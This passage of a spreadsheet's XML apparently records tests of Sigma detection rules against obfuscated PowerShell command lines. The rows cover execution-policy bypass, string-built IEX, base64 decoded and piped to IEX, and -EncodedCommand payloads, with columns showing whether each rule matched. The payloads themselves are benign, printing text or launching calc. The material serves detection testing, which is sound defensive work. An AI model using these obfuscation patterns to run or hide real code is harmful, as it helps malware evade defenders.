          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1220" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1220" s="4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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1221" ht="15.75" customHeight="1" s="42">
      <c r="A1221" s="43" t="n"/>
      <c r="B1221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1221" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1221" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1221" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1221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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1221" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1222" ht="15.75" customHeight="1" s="42">
      <c r="A1222" s="43" t="n"/>
      <c r="B1222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1222" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1222" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1222" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1222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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1223" ht="15.75" customHeight="1" s="42">
      <c r="A1223" s="43" t="n"/>
      <c r="B1223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1223" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1223" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1223" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -fIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1223" s="4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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1224" ht="15.75" customHeight="1" s="42">
      <c r="A1224" s="43" t="n"/>
      <c r="B1224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1224" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1224" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1224" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1224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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1225" ht="15.75" customHeight="1" s="42">
      <c r="A1225" s="43" t="n"/>
      <c r="B1225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1225" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1225" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1225" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXecutIONPOLicy Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1225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225" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1225" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1226" ht="15.75" customHeight="1" s="42">
      <c r="A1226" s="43" t="n"/>
      <c r="B1226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1226" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1226" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1226" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1226" s="43" t="n"/>
      <c r="J1226" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1226" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1227" ht="15.75" customHeight="1" s="42">
      <c r="A1227" s="43" t="n"/>
      <c r="B1227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1227" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1227" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1227" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1227" s="43" t="n"/>
      <c r="J1227" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1227" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1228" ht="15.75" customHeight="1" s="42">
      <c r="A1228" s="43" t="n"/>
      <c r="B1228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1228" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1228" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1228" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1228" s="44" t="n"/>
      <c r="J1228" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1228" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1229" ht="15.75" customHeight="1" s="42">
      <c r="A1229" s="43" t="n"/>
      <c r="B1229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1229" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1229" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1229" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1229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29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1230" ht="15.75" customHeight="1" s="42">
      <c r="A1230" s="43" t="n"/>
      <c r="B1230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1230" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1230" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1230" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1230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30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1230" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1231" ht="15.75" customHeight="1" s="42">
      <c r="A1231" s="43" t="n"/>
      <c r="B1231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1231" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1231" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1231" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaND "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1231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31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1232" ht="15.75" customHeight="1" s="42">
      <c r="A1232" s="43" t="n"/>
      <c r="B1232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1232" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1232" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1232" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1232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32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1233" ht="15.75" customHeight="1" s="42">
      <c r="A1233" s="43" t="n"/>
      <c r="B1233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1233" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1233" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1233" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1233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33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1234" ht="15.75" customHeight="1" s="42">
      <c r="A1234" s="43" t="n"/>
      <c r="B1234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1234" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1234" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1234" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1234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234" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1235" ht="15.75" customHeight="1" s="42">
      <c r="A1235" s="43" t="n"/>
      <c r="B1235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1235" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1235" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1235" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1235" s="43" t="n"/>
      <c r="J1235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1235" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1236" ht="15.75" customHeight="1" s="42">
      <c r="A1236" s="43" t="n"/>
      <c r="B1236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1236" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1236" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1236" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1236" s="44" t="n"/>
      <c r="J1236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1236" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1237" ht="15.75" customHeight="1" s="42">
      <c r="A1237" s="43" t="n"/>
      <c r="B1237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1237" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1237" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1237" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1237" s="43" t="n"/>
      <c r="J1237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1237" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1238" ht="15.75" customHeight="1" s="42">
      <c r="A1238" s="43" t="n"/>
      <c r="B1238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1238" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1238" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1238" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1238" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1238" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1238" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1239" ht="15.75" customHeight="1" s="42">
      <c r="A1239" s="43" t="n"/>
      <c r="B1239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1239" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1239" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1239" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1239" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1239" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1240" ht="15.75" customHeight="1" s="42">
      <c r="A1240" s="43" t="n"/>
      <c r="B1240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1240" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1240" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1240" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1240" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1240" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1240" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1241" ht="15.75" customHeight="1" s="42">
      <c r="A1241" s="43" t="n"/>
      <c r="B1241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1241" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1241" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1241" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1241" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1241" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1241" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1242" ht="15.75" customHeight="1" s="42">
      <c r="A1242" s="43" t="n"/>
      <c r="B1242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1242" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1242" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1242" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1242" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1242" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1242" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1243" ht="15.75" customHeight="1" s="42">
      <c r="A1243" s="43" t="n"/>
      <c r="B1243" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1243" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1243" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1243" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1243" s="43" t="n"/>
      <c r="J1243" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1243" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1244" ht="15.75" customHeight="1" s="42">
      <c r="A1244" s="43" t="n"/>
      <c r="B1244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1244" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1244" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1244" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1244" s="43" t="n"/>
      <c r="J1244" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1244" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1245" ht="15.75" customHeight="1" s="42">
      <c r="A1245" s="43" t="n"/>
      <c r="B1245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1245" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1245" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1245" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1245" s="43" t="n"/>
      <c r="J1245" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1245" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1246" ht="15.75" customHeight="1" s="42">
      <c r="A1246" s="43" t="n"/>
      <c r="B1246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1246" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1246" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1246" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1246" s="43" t="n"/>
      <c r="J1246" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1246" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1247" ht="15.75" customHeight="1" s="42">
      <c r="A1247" s="43" t="n"/>
      <c r="B1247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1247" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1247" s="44" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1247" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1247" s="43" t="n"/>
